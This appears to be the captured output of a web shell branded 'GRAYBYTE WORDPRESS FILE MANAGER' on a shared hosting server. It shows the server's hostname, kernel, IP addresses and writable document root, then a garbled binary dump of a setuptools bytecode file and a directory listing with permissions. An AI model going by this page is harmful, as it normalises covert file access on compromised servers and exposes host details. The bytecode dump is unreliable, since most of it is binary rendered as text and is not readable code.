✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ server366.web-hosting.com ​🇻​♯➤ 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2025

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 67.223.118.204 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.36
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /opt/alt/python310/lib/python3.10/site-packages/setuptools/__pycache__//depends.cpython-310.pyc
o

Xaib�@s�ddlZddlZddlZddlZddlmZddlmZmZm	Z	m
Z
ddlmZgd�ZGdd�d�Z
d	d
�Zddd
�Zddd�Zdd�Ze�dS)�N)�
StrictVersion�)�find_module�PY_COMPILED�	PY_FROZEN�	PY_SOURCE)�_imp)�Requirer�get_module_constant�extract_constantc@sLeZdZdZ		ddd�Zdd�Zdd	�Zddd�Zdd
d�Zddd�Z	dS)r	z7A prerequisite to building or installing a distribution�NcCsF|dur
|dur
t}|dur||�}|durd}|j�t��|`dS)N�__version__)r�__dict__�update�locals�self)r�name�requested_version�moduleZhomepage�	attribute�format�r��/builddir/build/BUILDROOT/alt-python310-setuptools-58.3.0-4.el8.x86_64/opt/alt/python310/lib/python3.10/site-packages/setuptools/depends.py�__init__szRequire.__init__cCs |jdur
d|j|jfS|jS)z0Return full package/distribution name, w/versionNz%s-%s)rr)rrrr�	full_name"s
zRequire.full_namecCs*|jdup|jdupt|�dko||jkS)z%Is 'version' sufficiently up-to-date?N�unknown)rr�strr)r�versionrrr�
version_ok(s�zRequire.version_okrcCs~|jdur"zt|j|�\}}}|r|��|WSty!YdSwt|j|j||�}|dur=||ur=|jdur=|�|�S|S)a�Get version number of installed module, 'None', or 'default'

        Search 'paths' for module.  If not found, return 'None'.  If found,
        return the extracted version attribute, or 'default' if no version
        attribute was specified, or the value cannot be determined without
        importing the module.  The version is formatted according to the
        requirement's version format (if any), unless it is 'None' or the
        supplied 'default'.
        N)rrr�close�ImportErrorr
r)r�paths�default�f�p�i�vrrr�get_version-s
�
zRequire.get_versioncCs|�|�duS)z/Return true if dependency is present on 'paths'N)r')rr!rrr�
is_presentHszRequire.is_presentcCs |�|�}|durdS|�|�S)z>Return true if dependency is present and up-to-date on 'paths'NF)r'r)rr!rrrr�
is_currentLs

zRequire.is_current)rNN)Nr�N)
�__name__�
__module__�__qualname__�__doc__rrrr'r(r)rrrrr	s
�

r	cCs"tjdd��}|s|�St�|�S)Ncss�dVdSr*rrrrr�emptyUs�zmaybe_close.<locals>.empty)�
contextlib�contextmanager�closing)r#r/rrr�maybe_closeTs


r3���cCs�zt||�\}}\}}}}	Wn
tyYdSwt|��C|tkr.|�d�t�|�}
n,|tkr9t�	||�}
n!|t
krFt|��|d�}
nt�|||	�}t
||d�Wd�SWd�n1sdwYt|
||�S)z�Find 'module' by searching 'paths', and extract 'symbol'

    Return 'None' if 'module' does not exist on 'paths', or it does not define
    'symbol'.  If the module defines 'symbol' as a constant, return the
    constant.  Otherwise, return 'default'.N��exec)rr r3r�read�marshal�loadrr�get_frozen_objectr�compileZ
get_module�getattrr)r�symbolr"r!r#�path�suffix�mode�kind�info�codeZimportedrrrr
_s&�


��
r
cCs�||jvrdSt|j��|�}d}d}d}|}t�|�D]$}|j}	|j}
|	|kr.|j|
}q|
|kr>|	|ks:|	|kr>|S|}qdS)aExtract the constant value of 'symbol' from 'code'

    If the name 'symbol' is bound to a constant value by the Python code
    object 'code', return that value.  If 'symbol' is bound to an expression,
    return 'default'.  Otherwise, return 'None'.

    Return value is based on the first assignment to 'symbol'.  'symbol' must
    be a global, or at least a non-"fast" local in the code block.  That is,
    only 'STORE_NAME' and 'STORE_GLOBAL' opcodes are checked, and 'symbol'
    must be present in 'code.co_names'.
    N�Z�a�d)�co_names�list�index�dis�Bytecode�opcode�arg�	co_consts)rCr=r"Zname_idx�
STORE_NAME�STORE_GLOBAL�
LOAD_CONST�constZ	byte_code�oprMrrrr|s 
�rcCs>tj�d�s
tjdkr
dSd}|D]}t�|=t�|�qdS)z�
    Patch the globals to remove the objects not available on some platforms.

    XXX it'd be better to test assertions about bytecode instead.
    �java�cliN)rr
)�sys�platform�
startswith�globals�__all__�remove)Zincompatiblerrrr�_update_globals�s�r\)r4N)r4)rVr8r0rJZdistutils.versionrrrrrrrrZr	r3r
rr\rrrr�<module>sD

$



Current_dir [ 𝗡𝗢𝗧 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
10 Feb 2026 6.04 AM
root / linksafe
0755
__init__.cpython-310.pyc
8.6 KB
9 Jan 2026 2.27 PM
root / linksafe
0644
_deprecation_warning.cpython-310.pyc
0.591 KB
9 Jan 2026 2.27 PM
root / linksafe
0644
_imp.cpython-310.pyc
2.081 KB
9 Jan 2026 2.27 PM
root / linksafe
0644
archive_util.cpython-310.pyc
5.763 KB
9 Jan 2026 2.27 PM
root / linksafe
0644
build_meta.cpython-310.pyc
8.954 KB
9 Jan 2026 2.27 PM
root / linksafe
0644
config.cpython-310.pyc
20.47 KB
9 Jan 2026 2.27 PM
root / linksafe
0644
dep_util.cpython-310.pyc
0.891 KB
9 Jan 2026 2.27 PM
root / linksafe
0644
depends.cpython-310.pyc
5.2 KB
9 Jan 2026 2.27 PM
root / linksafe
0644
dist.cpython-310.pyc
35.436 KB
9 Jan 2026 2.27 PM
root / linksafe
0644
errors.cpython-310.pyc
0.884 KB
9 Jan 2026 2.27 PM
root / linksafe
0644
extension.cpython-310.pyc
1.954 KB
9 Jan 2026 2.27 PM
root / linksafe
0644
glob.cpython-310.pyc
3.701 KB
9 Jan 2026 2.27 PM
root / linksafe
0644
installer.cpython-310.pyc
2.742 KB
9 Jan 2026 2.27 PM
root / linksafe
0644
launch.cpython-310.pyc
0.939 KB
9 Jan 2026 2.27 PM
root / linksafe
0644
monkey.cpython-310.pyc
4.58 KB
9 Jan 2026 2.27 PM
root / linksafe
0644
msvc.cpython-310.pyc
41.693 KB
9 Jan 2026 2.27 PM
root / linksafe
0644
namespaces.cpython-310.pyc
3.587 KB
9 Jan 2026 2.27 PM
root / linksafe
0644
package_index.cpython-310.pyc
31.782 KB
9 Jan 2026 2.27 PM
root / linksafe
0644
py34compat.cpython-310.pyc
0.524 KB
9 Jan 2026 2.27 PM
root / linksafe
0644
sandbox.cpython-310.pyc
15.442 KB
9 Jan 2026 2.27 PM
root / linksafe
0644
unicode_utils.cpython-310.pyc
1.14 KB
9 Jan 2026 2.27 PM
root / linksafe
0644
version.cpython-310.pyc
0.37 KB
9 Jan 2026 2.27 PM
root / linksafe
0644
wheel.cpython-310.pyc
7.231 KB
9 Jan 2026 2.27 PM
root / linksafe
0644
windows_support.cpython-310.pyc
1.055 KB
9 Jan 2026 2.27 PM
root / linksafe
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF